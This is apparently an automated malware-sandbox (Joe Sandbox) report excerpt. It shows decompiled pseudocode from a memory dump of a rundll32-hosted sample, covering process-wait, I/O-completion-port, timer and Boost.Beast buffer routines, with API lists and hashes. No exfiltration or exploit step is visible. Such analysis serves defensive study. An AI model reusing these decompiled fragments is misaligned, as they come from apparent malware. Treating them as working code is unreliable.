                				long long _v128;
                				char _v232;
                				long long _v320;
                				char _v424;
                				char _v472;
                				char _v528;
                				char _v560;
                				intOrPtr _v568;
                				long long _v656;
                				char _v664;
                				char _v712;
                				long long _v760;
                				char _v768;
                				long long _v776;
                				long long _v800;
                				char _v808;
                				long long _v816;
                				char _v872;
                				long long _v880;
                				char _v936;
                				signed long long _v944;
                				long long _v952;
                				long long _v968;
                				intOrPtr _v984;
                				char _v1008;
                				long long _v1016;
                				long long _v1024;
                				long long _v1032;
                				long long _v1040;
                				long long _v1048;
                				long long _v1056;
                				char _v1064;
                				long long _v1072;
                				long long _v1080;
                				void* _v1088;
                				long long _v1096;
                				long long _v1104;
                				char _v1112;
                				long long _v1120;
                				long long _v1136;
                				long long _v1144;
                				char _v1160;
                				signed long long _v1176;
                				long long _v1184;
                				long long _v1192;
                				long long _v1200;
                				long long _v1208;
                				long long _v1216;
                				long long _v1224;
                				long long _v1232;
                				long long _v1240;
                				long long _v1256;
                				intOrPtr _v1272;
                				intOrPtr _v1280;
                				char _v1288;
                				signed long long _v1296;
                				long _v1304;
                				long long _v1312;
                				char _v1320;
                				long long _v1328;
                				long long _v1336;
                				signed long long _v1344;
                				long _v1352;
                				char _v1359;
                				intOrPtr* _v1376;
                				signed long long _v1400;
                				intOrPtr _v1416;
                				char _v1424;
                				intOrPtr _v1440;
                				char _v1448;
                				long long _v1456;
                				long long _v1464;
                				long long _v1472;
                				long long _v1480;
                				char _v1536;
                				long long _v1544;
                				char _v1600;
                				long long _v1608;
                				char _v1616;
                				long long _v1624;
                				char _v1632;
                				long long _v1640;
                				long long _v1648;
                				long long _v1656;
                				long long _v1664;
                				char _v1672;
                				long long _v1680;
                				long long _v1688;
                				long long _v1696;
                				long long _v1704;
                				char _v1712;
                				intOrPtr _v1720;
                				char _v1736;
                				char _v1744;
                				char _v1752;
                				long long _v1760;
                				void* _v1768;
                				long long _v1776;
                				char _v1784;
                				signed long long _v1792;
                				intOrPtr _v1800;
                				intOrPtr _v1816;
                				intOrPtr _v1820;
                				intOrPtr _v1824;
                				char _v1828;
                				signed int _v1829;
                				char _v1830;
                				signed char _v1831;
                				signed int _v1832;
                				long long _v1848;
                				long long _v1856;
                				long long _v1864;
                				signed int _t265;
                				signed int _t266;
                				void* _t293;
                				intOrPtr _t296;
                				intOrPtr _t299;
                				signed int _t300;
                				signed int _t301;
                				void* _t307;
                				void* _t308;
                				void* _t335;
                				long long _t355;
                				long long _t356;
                				long long _t358;
                				long long _t359;
                				long long _t362;
                				signed long long _t363;
                				signed long long _t365;
                				intOrPtr* _t372;
                				long long _t373;
                				signed long long _t375;
                				char* _t381;
                				long long _t382;
                				intOrPtr* _t385;
                				long long _t388;
                				intOrPtr* _t391;
                				long long _t411;
                				intOrPtr* _t426;
                				intOrPtr* _t429;
                				long long _t435;
                				long long _t440;
                				long long _t450;
                				long long _t463;
                				void* _t467;
                				void* _t470;
                				char* _t479;
                				long long _t480;
                				void* _t493;
                				long long _t495;
                
                				_t488 = __r9;
                				_t473 = __r8;
                				_t469 = __rbp;
                				_t309 = __eflags;
                				_t307 = __esi;
                				_t300 = __edx;
                				_t293 = __ebx;
                				_t335 = _t470;
                				 *((long long*)(_t335 - 0x468)) = 0xfffffffe;
                				 *((long long*)(_t335 + 8)) = __rbx;
                				 *((long long*)(_t335 + 0x10)) = __rsi;
                				 *((long long*)(_t335 + 0x18)) = __rdi;
                				 *((long long*)(_t335 + 0x20)) = __r14;
                				asm("movaps [eax-0x18], xmm6");
                				_t463 = __r9;
                				_t372 = __r8;
                				_t467 = __rdx;
                				_t493 = __rcx;
                				E0000021521520594A10(__edx, __edi, __eflags, _t335, __r8, _t335 - 0x6c8, __rdx, __rdx, __rbp, __r8, __r9);
                				_t381 =  &_v1424;
                				E00000215215205BB650(_t309, _t335, _t381);
                				_t435 = _v1416 - _v1424;
                				r15d = 0;
                				_t382 =  !=  ? _v1424 : _t381;
                				_v1120 = _t382;
                				_v1040 = _t435;
                				_v1632 = _t382;
                				_v1624 = _t435;
                				E00000215215205B9ED0(r15d, _t335, _t372,  &_v232,  &_v1736, _t473, __r9);
                				_v816 = _t495;
                				_v1672 = _t463;
                				_v1664 =  &_v1424;
                				_v1656 =  &_v232;
                				_v1648 =  &_v1632;
                				_v1640 =  &_v872;
                				_v1480 = _t495;
                				_v1032 =  &_v1536;
                				_v1024 =  &_v1536;
                				_v1536 = 0x2063fb60;
                				_v1536 = 0x2063f958;
                				asm("movups xmm0, [esp+0xe0]");
                				asm("movups [esp+0x170], xmm0");
                				asm("movups xmm1, [esp+0xf0]");
                				asm("movups [esp+0x180], xmm1");
                				asm("movsd xmm0, [esp+0x100]");
                				asm("movsd [esp+0x190], xmm0");
                				_v1480 =  &_v1536;
                				E00000215215205BCC90(_t300, _t372,  &_v1536,  &_v872, _t467);
                				_t385 = _v1480;
                				if (_t385 == 0) goto 0x205baba1;
                				_t301 = _t300 & 0xffffff00 | _t385 !=  &_v1536;
                				 *((intOrPtr*)( *_t385 + 0x20))();
                				_v1480 = _t495;
                				E00000215215205BB650(_t385 -  &_v1536,  *_t385,  &_v1448);
                				_t440 = _v1440 - _v1448;
                				_t388 =  !=  ? _v1448 : _t495;
                				_v1136 = _t388;
                				_v1016 = _t440;
                				_v1616 = _t388;
                				_v1608 = _t440;
                				E00000215215205B9ED0(r15d,  *_t385, _t372,  &_v424,  &_v1736, _t473, _t488);
                				_v880 = _t495;
                				_v1712 = _a40;
                				_v1704 =  &_v1448;
                				_v1696 =  &_v424;
                				_v1688 =  &_v1616;
                				_v1680 =  &_v936;
                				_v1544 = _t495;
                				_v952 =  &_v1600;
                				_v1240 =  &_v1600;
                				_v1600 = 0x2063fb60;
                				_v1600 = 0x2063fa40;
                				asm("movups xmm0, [esp+0xb8]");
                				asm("movups [esp+0x130], xmm0");
                				asm("movups xmm1, [esp+0xc8]");
                				asm("movups [esp+0x140], xmm1");
                				asm("movsd xmm0, [esp+0xd8]");
                				asm("movsd [esp+0x150], xmm0");
                				_v1544 =  &_v1600;
                				E00000215215205BCC90(_t301, _t372,  &_v1600,  &_v936, _t467);
                				_t391 = _v1544;
                				if (_t391 == 0) goto 0x205bad19;
                				_t302 = _t301 & 0xffffff00 | _t391 !=  &_v1600;
                				 *((intOrPtr*)( *_t391 + 0x20))();
                				_v1544 = _t495;
                				_t355 =  *((intOrPtr*)(_t372 + 0x10));
                				_v1232 = _t355;
                				if ( *((long long*)(_t372 + 0x18)) - 0x10 < 0) goto 0x205bad2f;
                				_t373 =  *_t372;
                				_v1760 = _t373;
                				_v1336 = _t373;
                				_v1328 = _t355;
                				E00000215215205B9ED0(r15d, _t355, _t373,  &_v664,  &_v1736, _t473, _t488);
                				E00000215215205BA730(_t355, _t373,  &_v1288);
                				_v1224 = _t355;
                				E00000215215205BCB20( *((long long*)(_t372 + 0x18)) - 0x10, _t355, _t373,  &_v1008, _t355, _t467);
                				if (_v1272 == 0) goto 0x205badb8;
                				E00000215215205BBE00(_t301 & 0xffffff00 | _t391 !=  &_v1600, _v1272, _v1256 - _v1272 >> 3);
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x270], xmm0");
                				_v1256 = _t495;
                				if (_v1280 == 0) goto 0x205badcc;
                				_v1288();
                				E0000021521520589490(_t373,  &_v1672, _t493, _t467, __rbp, " ", _t488);
                				E00000215215205895D0( &_v1712, _t355, 0x2063fb60, _t467, _t469, _t467, _t488);
                				_v1216 = _t355;
                				_v1104 = _v656;
                				_v1096 =  &_v664;
                				_v1080 = _v320;
                				_v1072 =  &_v424;
                				_v1056 = _v128;
                				_v1048 =  &_v232;
                				_v1848 = 0x2063b1c0;
                				_v1856 =  &_v1008;
                				_v1864 =  &_v1112;
                				_t479 =  &_v1064;
                				E0000021521520586820(E0000021521520586820(E00000215215205BD200( &_v1400), r15d,  &_v1712), r15d,  &_v1672);
                				_t356 =  &_v664;
                				_v1208 = _t356;
                				_v1832 = _v1832 & 0x000000ff;
                				_v1472 = _t356;
                				_v1464 = _t356;
                				_v1456 = _t495;
                				asm("movups xmm0, [esp+0x1a8]");
                				asm("movaps [esp+0x480], xmm0");
                				asm("movsd xmm1, [esp+0x1b8]");
                				asm("movsd [esp+0x490], xmm1");
                				_v800 =  &_v664;
                				asm("movups xmm1, [esp+0x230]");
                				asm("movups [esp+0x450], xmm1");
                				_v776 = _t495;
                				_t358 =  &_v664;
                				_v760 = _t358;
                				_v768 = 1;
                				asm("movdqa xmm0, xmm1");
                				asm("psrldq xmm0, 0x8");
                				asm("dec cx");
                				_t411 =  !=  ? _t495 : _t479;
                				_v1144 = _t411;
                				asm("dec ax");
                				_t450 = _t355 + _t411;
                				_v1200 = _t450;
                				_t480 = _t479 - _t411;
                				_v1192 = _t480;
                				_t359 =  <  ? _t480 : _t358;
                				_v1184 = _t359;
                				_v1320 = _t450;
                				_v1312 = _t359;
                				_v1864 =  &_v528;
                				E00000215215205C16C0(_t301 & 0xffffff00 | _t391 !=  &_v1600, _t307, _t308, _t373, _v568,  &_v560, _t467, _t469,  &_v1320,  &_v808);
                				_v1831 = _v1832 & 0x000000ff;
                				_v1752 =  &_v232;
                				E00000215215205BE110(_t301 & 0xffffff00 | _t391 !=  &_v1600, _t373,  &_v1752,  &_v872, 0x2063fb60, _t467,  &_v1632,  &_v808);
                				_v1830 = _v1831 & 0x000000ff;
                				_t362 =  &_v424;
                				_v1744 = _t362;
                				E00000215215205BE110(_t301 & 0xffffff00 | _t391 !=  &_v1600, _t373,  &_v1744,  &_v936, 0x2063fb60, _t467,  &_v1616,  &_v808);
                				_v1784 = _t362;
                				_v1776 = _t362;
                				_v1768 = _t495;
                				_t265 = E0000021521520593C30(_t373, _v1720,  &_v1784, 0x2063fb60, _t467);
                				_t363 = _v1768;
                				if ((_t265 & 0x00000001) == 0) goto 0x205bb0bf;
                				if (_t363 != 1) goto 0x205bb09e;
                				_t266 = _t265 & 0xffffff00 | _v1784 != 0x00000000;
                				_v1829 = _t266;
                				if (_t266 == 0) goto 0x205bb0bf;
                				E0000021521520590A80(r15d, _t363, _t373,  &_v472,  &_v1784);
                				E000002152152059DF30(_t266, _t373,  &_v472, _t467,  &_v1616);
                				_v1800 = r15d;
                				E00000215215205BC080( &_v472,  &_v1784);
                				_v1792 = _t363;
                				if (_v1359 != 0) goto 0x205bb22f;
                				_t296 =  *_v1376;
                				_v1820 = _t296;
                				if (_t296 != 0x103) goto 0x205bb22f;
                				_t365 = _v1400 - 1;
                				if (_t365 - 0xfffffffd > 0) goto 0x205bb22f;
                				_v1828 = 1;
                				if (WaitForSingleObject(??, ??) != 0xffffffff) goto 0x205bb156;
                				E00000215215205BC080(_v1400,  &_v1784);
                				_v1176 = _t365;
                				_v1304 = GetLastError();
                				_v1296 = _t365;
                				asm("movaps xmm6, [esp+0x250]");
                				asm("movaps [esp+0x60], xmm6");
                				goto 0x205bb1b5;
                				if (GetExitCodeProcess(??, ??) != 0) goto 0x205bb1a1;
                				E00000215215205BC080(_v1400,  &_v1828);
                				_t375 = _t365;
                				_v944 = _t365;
                				_v1352 = GetLastError();
                				_v1344 = _t375;
                				asm("movaps xmm6, [esp+0x220]");
                				asm("movaps [esp+0x60], xmm6");
                				goto 0x205bb1b5;
                				_v1800 = r15d;
                				E00000215215205BC080(_v1400,  &_v1828);
                				_v1792 = _t365;
                				asm("movaps xmm6, [esp+0x60]");
                				CloseHandle(??);
                				_t376 = _t375 | 0xffffffff;
                				_v1400 = _t375 | 0xffffffff;
                				if (_v1800 != 0) goto 0x205bb1e6;
                				 *_v1376 = _v1828;
                				goto 0x205bb233;
                				asm("movdqa [esp+0x2e0], xmm6");
                				E00000215215205B80C0( *_v1376, _t302 | 0xffffffff, _t375 | 0xffffffff,  &_v712,  &_v1160, _t467, _t469, "wait error");
                				_v712 = 0x2063fa28;
                				E00000215215205F9940(_t375 | 0xffffffff,  &_v712, 0x2066bb58, _t467);
                				_t299 =  *_v1376;
                				_v1816 = _t299;
                				_v1824 = _t299;
                				E00000215215205BA460(_v1376, _t376 | 0xffffffff,  &_v1400, _t467);
                				if (_v984 == 0) goto 0x205bb28a;
                				E00000215215205BBE00(_t302 | 0xffffffff, _v984, _v968 - _v984 >> 3);
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [esp+0x390], xmm0");
                				_v968 = _t495;
                				E00000215215205889C0(_t299,  &_v1008);
                				E00000215215205B9F90(_v1376, _t376 | 0xffffffff,  &_v664);
                				_t426 = _v880;
                				if (_t426 == 0) goto 0x205bb2cf;
                				 *((intOrPtr*)( *_t426 + 0x20))();
                				_v880 = _t495;
                				E00000215215205B9F90( *_t426, _t376 | 0xffffffff,  &_v424);
                				E00000215215205889C0(_t299,  &_v1448);
                				_t429 = _v816;
                				if (_t429 == 0) goto 0x205bb314;
                				 *((intOrPtr*)( *_t429 + 0x20))();
                				_v816 = _t495;
                				E00000215215205B9F90( *_t429, _t376 | 0xffffffff,  &_v232);
                				E00000215215205889C0(_t299,  &_v1424);
                				asm("lock xadd [0xc81a8], ebx");
                				if (_t293 != 1) goto 0x205bb344;
                				__imp__#116();
                				E00000215215205917D0(_t376 | 0xffffffff,  &_v1736, _t467);
                				asm("inc ecx");
                				return _v1824;
                			}
                0x215205bb1d4
                0x215205bb1e2
                0x215205bb1e4
                0x215205bb1e6
                0x215205bb206
                0x215205bb213
                0x215205bb22a
                0x215205bb23b
                0x215205bb23d
                0x215205bb243
                0x215205bb24f
                0x215205bb260
                0x215205bb271
                0x215205bb276
                0x215205bb279
                0x215205bb282
                0x215205bb292
                0x215205bb2a0
                0x215205bb2a6
                0x215205bb2b1
                0x215205bb2c4
                0x215205bb2c7
                0x215205bb2d7
                0x215205bb2e5
                0x215205bb2eb
                0x215205bb2f6
                0x215205bb309
                0x215205bb30c
                0x215205bb31c
                0x215205bb32a
                0x215205bb330
                0x215205bb33b
                0x215205bb33d
                0x215205bb34c
                0x215205bb36e
                0x215205bb378

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$CleanupCloseCodeExceptionExitHandleObjectProcessSingleStartupThrowWait
                • String ID: wait error
                • API String ID: 1743618437-4158087810
                • Opcode ID: 06f834677d2f740243c0c14ad8df5bb738393c86fb7ca113d889df3d4f88d045
                • Instruction ID: f62a2d70e2a6e0b5ef52f39f8bffe26cc52f524643e94a926f0d2764d8d3a828
                • Opcode Fuzzy Hash: 06f834677d2f740243c0c14ad8df5bb738393c86fb7ca113d889df3d4f88d045
                • Instruction Fuzzy Hash: 0232F17220AFC4D5EA719B24E4843EAB3A4FBD9750F505226DADD43A9DEF38C194CB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E00000215215205935D0(signed int __edi, long long __rbx, long long __rcx, long long __rdx, long long __rbp, void* __r9, long long _a16) {
                				void* _v24;
                				intOrPtr _v180;
                				intOrPtr _v184;
                				char _v240;
                				long long _v248;
                				long long _v256;
                				long long _v264;
                				long long _v272;
                				char _v280;
                				void* __rdi;
                				void* __rsi;
                				int _t55;
                				void* _t70;
                				void* _t71;
                				signed int _t84;
                				void* _t85;
                				void* _t87;
                				long long _t104;
                				long _t124;
                				longlong _t127;
                				void* _t133;
                				void* _t136;
                				void* _t140;
                				void* _t141;
                				struct _OSVERSIONINFOEXA* _t143;
                
                				_t140 = __r9;
                				_t121 = __rdx;
                				_t141 = _t133;
                				 *((long long*)(_t141 + 8)) = __rcx;
                				_v256 = 0xfffffffe;
                				 *((long long*)(_t141 + 0x18)) = __rbx;
                				 *((long long*)(_t141 + 0x20)) = __rbp;
                				_t104 = __rcx;
                				 *((long long*)(__rcx)) = 0x2063c108;
                				r14d = 0;
                				 *(__rcx + 8) = _t143;
                				 *(__rcx + 0x10) = _t143;
                				 *((long long*)(__rcx + 0x18)) = __rdx;
                				 *(__rcx + 0x20) = _t143;
                				 *((long long*)(__rcx)) = 0x2063f570;
                				 *((long long*)(__rcx)) = 0x2063c748;
                				 *(__rcx + 0x28) = _t143;
                				 *(__rcx + 0x30) = _t143;
                				 *(__rcx + 0x38) = _t143;
                				r8d = 0x9c;
                				E00000215215205F8EF0(_t71, 0, __edi, _t87, _t141 - 0xb8, __rdx, _t124, _t136);
                				_v184 = 0x9c;
                				_v180 = 6;
                				r8b = 3;
                				__imp__VerSetConditionMask();
                				_t16 =  &(_t143->dwOSVersionInfoSize); // 0x2
                				_t55 = VerifyVersionInfoA(_t143, _t124, _t127);
                				_t84 = __edi | 0xffffffff;
                				_t74 =  !=  ? _t84 : 0x1f4;
                				 *((intOrPtr*)(_t104 + 0x40)) =  !=  ? _t84 : 0x1f4;
                				 *(_t104 + 0x48) = _t143;
                				 *(_t104 + 0x50) = _t143;
                				 *((intOrPtr*)(_t104 + 0x58)) = r14d;
                				_t22 = _t104 + 0x60; // 0x60
                				E00000215215205913B0(_t16, _t55, _t104, _t22, __rdx, _t127);
                				 *(_t104 + 0x88) = _t143;
                				 *(_t104 + 0x90) = _t143;
                				 *(_t104 + 0x98) = _t143;
                				 *((intOrPtr*)(_t104 + 0xa0)) = 0xffffffff;
                				 *(_t104 + 0xa8) = _t143;
                				r9d = _t84;
                				r8d = 0;
                				CreateIoCompletionPort(??, ??, ??, ??);
                				 *((long long*)(_t104 + 0x28)) = 0x2063c748;
                				if (0x2063c748 != 0) goto 0x2059377b;
                				_t85 = GetLastError();
                				E000002152152058F380(_t22 | 0xffffffff, _t121);
                				_v280 = 0x2063c748;
                				_v272 = 0x2063c748;
                				if ( *0x2152063C750 + 0xda812030 - 1 <= 0) goto 0x20593731;
                				 *((intOrPtr*)( *0x2063c748 + 0x30))();
                				goto 0x20593736;
                				_v264 = 0xda812030;
                				_v280 = _t85;
                				_v272 = 0x2063c748;
                				if (((0 | _t85 != 0x00000000) & 1) == 0) goto 0x2059377b;
                				if (0x4d54ee85da812032 != 1) goto 0x20593759;
                				if (_t85 == 0) goto 0x2059377b;
                				E0000021521520590B90( !=  ? _t84 : 0x1f4, _t104,  &_v240,  &_v280, "iocp");
                				E000002152152059DF30(_t85, _t104,  &_v240, 0x2063c748, "iocp");
                				if (bpl == 0) goto 0x20593805;
                				asm("lock inc dword [ebx+0x30]");
                				E00000215215205F4DCC(0x4d54ee85da812032,  &_v240);
                				_a16 = 0x4d54ee85da812032;
                				 *0x4D54EE85DA81203A = _t143;
                				 *0x4D54EE85DA812042 = _t143;
                				E00000215215205F4DCC(0x4d54ee85da812032,  &_v240);
                				_v248 = 0x4d54ee85da812032;
                				 *((long long*)(0x4d54ee85da812032)) = 0x2063f7f0;
                				 *((long long*)(0x4d54ee85da812032)) = 0x2063c438;
                				 *0x4D54EE85DA81204A = _t104;
                				r8d = 0;
                				E0000021521520591990(_t104, 0x4d54ee85da812032, 0x4d54ee85da812032, 0x4d54ee85da812032, 0x2063c748, _t140);
                				if ( *(_t104 + 0xa8) == 0) goto 0x205937fe;
                				CloseHandle(??);
                				_t70 = E00000215215205F51EC(0x4d54ee85da812032, _t104,  *(_t104 + 0xa8));
                				 *(_t104 + 0xa8) = 0x4d54ee85da812032;
                				return _t70;
                 			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseCompletionConditionCreateErrorHandleInfoLastMaskPortVerifyVersion
                • String ID: iocp
                • API String ID: 4287750199-976528080
                • Opcode ID: ab3c2d61510c8957961955912b72ee2fbd86150171343daf3d8515332e47b646
                • Instruction ID: 7b2d0f3fcd26892716b74f1b94a05352b6ac93d381f404b542fa1a21b06854d8
                • Opcode Fuzzy Hash: ab3c2d61510c8957961955912b72ee2fbd86150171343daf3d8515332e47b646
                • Instruction Fuzzy Hash: DC51AB33202F50C6EB609F25E8887D933A5FB94BA4F244225DE9D47BA8DF38C956D740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00000215215205A55D0(void* __edx, long long __rbx, intOrPtr* __rcx, long long* __rdx, long long __r8) {
                				void* __rdi;
                				void* __rsi;
                				void* _t60;
                				void* _t61;
                				void* _t62;
                				void* _t64;
                				void* _t66;
                				void* _t67;
                				intOrPtr _t80;
                				long long _t86;
                				long long _t89;
                				long long* _t100;
                				intOrPtr _t103;
                				long long _t107;
                				long long _t112;
                				long long _t115;
                				long long _t117;
                				void* _t120;
                				void* _t126;
                				long long _t129;
                				long long _t130;
                				intOrPtr* _t131;
                				intOrPtr _t133;
                				void* _t134;
                				void* _t136;
                				void* _t144;
                				long long* _t145;
                
                				 *((long long*)(_t134 + 0x60)) = 0xfffffffe;
                				 *((long long*)(_t134 + 0xe8)) = __rbx;
                				_t130 = __r8;
                				_t145 = __rdx;
                				_t100 = __rcx;
                				_t144 =  *((intOrPtr*)(__rcx + 0x10)) -  *((intOrPtr*)(__rcx + 8));
                				_t131 = __rcx + 0x28;
                				_t80 =  *_t131;
                				if (_t144 - _t80 > 0) goto 0x205a5746;
                				if (__r8 - _t80 - _t144 > 0) goto 0x205a5746;
                				_t103 =  *((intOrPtr*)(__rcx + 0x20));
                				_t117 =  *((intOrPtr*)(__rcx + 0x10));
                				if (__r8 - _t103 - _t117 > 0) goto 0x205a5644;
                				 *((long long*)(__rcx + 0x18)) = _t117 + __r8;
                				 *__rdx = _t117;
                				goto 0x205a57e1;
                				if (__r8 - _t103 -  *__rcx - _t144 > 0) goto 0x205a5681;
                				if (_t144 == 0) goto 0x205a5665;
                				_t136 = _t144;
                				E00000215215205F7310(_t62, _t64, _t66, _t67,  *__rcx,  *((intOrPtr*)(__rcx + 8)), _t126, __r8, _t136);
                				_t86 =  *_t100;
                				 *((long long*)(_t100 + 8)) = _t86;
                				_t107 = _t86 + _t144;
                				 *((long long*)(_t100 + 0x10)) = _t107;
                				 *((long long*)(_t100 + 0x18)) = _t107 + __r8;
                				goto 0x205a57de;
                				 *((long long*)(_t134 + 0xe0)) = _t144 + _t136;
                				 *((long long*)(_t134 + 0xf8)) = _t144 + _t144;
                				_t120 =  >=  ? _t134 + 0xf8 : _t134 + 0xe0;
                				_t89 =  *_t131;
                				_t132 =  <  ? _t120 : _t131;
                				_t133 =  *((intOrPtr*)( <  ? _t120 : _t131));
                				if (_t133 != 0) goto 0x205a56c8;
                				goto 0x205a56fe;
                				if (_t133 - 0x1000 < 0) goto 0x205a56f3;
                				if (_t133 + 0x27 - _t133 > 0) goto 0x205a56e0;
                				E00000215215205F5BBC(_t61, __edx, _t133 + 0x27 - _t133, _t89, _t100, _t126);
                				asm("int3");
                				E00000215215205F4DCC(_t89, _t133 + 0x27);
                				_t22 = _t89 + 0x27; // 0x27
                				 *((long long*)((_t22 & 0xffffffe0) - 8)) = _t89;
                				goto 0x205a56fe;
                				E00000215215205F4DCC(_t89, _t133);
                				_t129 = _t89;
                				if ( *_t100 == 0) goto 0x205a5722;
                				E0000021521520586F00(E00000215215205F7310(_t62, 0, _t66, _t67, _t129,  *((intOrPtr*)(_t100 + 8)), _t129, __r8, _t144), __edx, _t100,  *_t100,  *((intOrPtr*)(_t100 + 0x20)) -  *_t100);
                				 *_t100 = _t129;
                				 *((long long*)(_t100 + 8)) = _t129;
                				_t112 = _t129 + _t144;
                				 *((long long*)(_t100 + 0x10)) = _t112;
                				 *((long long*)(_t100 + 0x18)) = _t112 + __r8;
                				 *((long long*)(_t100 + 0x20)) = _t129 + _t133;
                				goto 0x205a57de;
                				 *((long long*)(_t134 + 0x20)) = 0x206278d0;
                				 *((long long*)(_t134 + 0x28)) = 0x206278d0;
                				 *((long long*)(_t134 + 0x30)) = 0x206278d0;
                				 *((long long*)(_t134 + 0x50)) = "basic_flat_buffer too long";
                				 *((char*)(_t134 + 0x58)) = 1;
                				E00000215215205F7764(_t100, _t134 + 0x50, _t134 + 0x28, _t129, __r8);
                				 *((long long*)(_t134 + 0x20)) = 0x20627910;
                				 *((long long*)(_t134 + 0x20)) = 0x20627940;
                				 *((long long*)(_t134 + 0x38)) = "D:\\Sources\\boost_1_78_0\\boost/beast/core/impl/flat_buffer.hpp";
                				 *((long long*)(_t134 + 0x40)) = "class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)";
                				 *((long long*)(_t134 + 0x48)) = 0x145;
                				E000002152152059FCD0(_t100, _t134 + 0x68, _t134 + 0x20, _t130, _t134 + 0x38);
                				_t115 = _t134 + 0x68;
                				_t60 = E00000215215205F9940(_t100, _t115, 0x2066b800, _t130);
                				 *_t145 = _t115;
                				 *((long long*)(_t145 + 8)) = _t130;
                				return _t60;
                 			}

                APIs
                Strings
                • class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64), xrefs: 00000215205A57A3
                • D:\Sources\boost_1_78_0\boost/beast/core/impl/flat_buffer.hpp, xrefs: 00000215205A5797
                • basic_flat_buffer too long, xrefs: 00000215205A575E
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow__std_exception_copy
                • String ID: D:\Sources\boost_1_78_0\boost/beast/core/impl/flat_buffer.hpp$basic_flat_buffer too long$class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)
                • API String ID: 1552479455-3830817604
                • Opcode ID: 243388d3072fccf316b3f9b6ae61306adf9277674fdeebfd3a50bfabf4517a00
                • Instruction ID: 3e828f61abe00dfa1da39936ac0c5d7b9bf38eed125bbfc16459796c79c89db2
                • Opcode Fuzzy Hash: 243388d3072fccf316b3f9b6ae61306adf9277674fdeebfd3a50bfabf4517a00
                • Instruction Fuzzy Hash: 08516933202FA4D5DB20DF15E4887D973A4FB98B94F9086629E9D037A8EF38C155C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 56%
                			E0000021521520594650(long long _a8, long long _a16) {
                				void* _v24;
                				char _v72;
                				long long _v80;
                				long long _v88;
                				char _v96;
                				char _v104;
                				intOrPtr _v128;
                				struct _CRITICAL_SECTION* _v136;
                				void* _t59;
                				void* _t75;
                				long long _t76;
                				long long _t80;
                				long long _t81;
                				long long _t84;
                				long long _t98;
                				void* _t102;
                				long long _t103;
                				void* _t105;
                				long long _t106;
                				long long _t109;
                				void* _t112;
                				void* _t117;
                				struct _CRITICAL_SECTION* _t119;
                
                				_t75 = _t112;
                				 *((long long*)(_t75 - 0x78)) = 0xfffffffe;
                				 *((long long*)(_t75 + 0x18)) = _t80;
                				 *((long long*)(_t75 + 0x20)) = _t109;
                				_t81 = _t98;
                				_t103 = _t84;
                				 *((long long*)(_t75 - 0x70)) = _t84 + 0x60;
                				EnterCriticalSection(_t119);
                				_v104 = 1;
                				_t76 =  *((intOrPtr*)(_t103 + 0x88));
                				 *((long long*)(_t81 + 8)) = _t76;
                				 *((long long*)(_t103 + 0x88)) = _t81;
                				r14d = 0;
                				if ( *((intOrPtr*)(_t103 + 0x50)) != _t119) goto 0x20594785;
                				r8d = 0;
                				CreateWaitableTimerA(??, ??, ??);
                				 *((long long*)(_t103 + 0x50)) = _t76;
                				if (_t76 != 0) goto 0x2059474e;
                				_t59 = GetLastError();
                				E000002152152058F380(_t84 + 0x60, _t98);
                				_t106 = _t76;
                				_v96 = _t76;
                				_v88 = _t76;
                				if ( *((intOrPtr*)(_t106 + 8)) + 0xda812030 - 1 <= 0) goto 0x20594704;
                				 *((intOrPtr*)( *_t106 + 0x30))();
                				goto 0x20594709;
                				_v80 = 0xda812030;
                				_v96 = _t59;
                				_v88 = _t106;
                				if (((0 | _t59 != 0x00000000) & 1) == 0) goto 0x2059474e;
                				if (0x4d54ee85da812032 != 1) goto 0x2059472c;
                				if (_t59 == 0) goto 0x2059474e;
                				E0000021521520590B90(0, _t81,  &_v72,  &_v96, "timer", _t102);
                				E000002152152059DF30(_t59, _t81,  &_v72, _t106, "timer");
                				_a8 = 0x4d2fa200;
                				_v128 = r14d;
                				_v136 = _t119;
                				r9d = 0;
                				r8d = 0x493e0;
                				SetWaitableTimer(??, ??, ??, ??, ??, ??);
                				if ( *((intOrPtr*)(_t103 + 0x48)) != _t119) goto 0x20594808;
                				E00000215215205F4DCC(0x4d2fa200,  *((intOrPtr*)(_t103 + 0x50)));
                				_a8 = 0x4d2fa200;
                				 *0xFFFFFFFF4D2FA208 = _t119;
                				 *0xFFFFFFFF4D2FA210 = _t119;
                				E00000215215205F4DCC(0x4d2fa200,  *((intOrPtr*)(_t103 + 0x50)));
                				_a16 = 0x4d2fa200;
                				 *0x4d2fa200 = 0x2063f7f0;
                				 *0x4d2fa200 = 0x2063c630;
                				 *0xFFFFFFFF4D2FA218 = _t103;
                				r8d = 0x10000;
                				E0000021521520591990(0x4d2fa200, 0x4d2fa200, 0x4d2fa200, _t103, _t106, _t117);
                				if ( *((intOrPtr*)(_t103 + 0x48)) == 0) goto 0x20594804;
                				CloseHandle(_t105);
                				E00000215215205F51EC(0x4d2fa200, 0x4d2fa200,  *((intOrPtr*)(_t103 + 0x48)));
                				 *((long long*)(_t103 + 0x48)) = 0x4d2fa200;
                				return LeaveCriticalSection(??);
                 			}

                APIs
                Strings
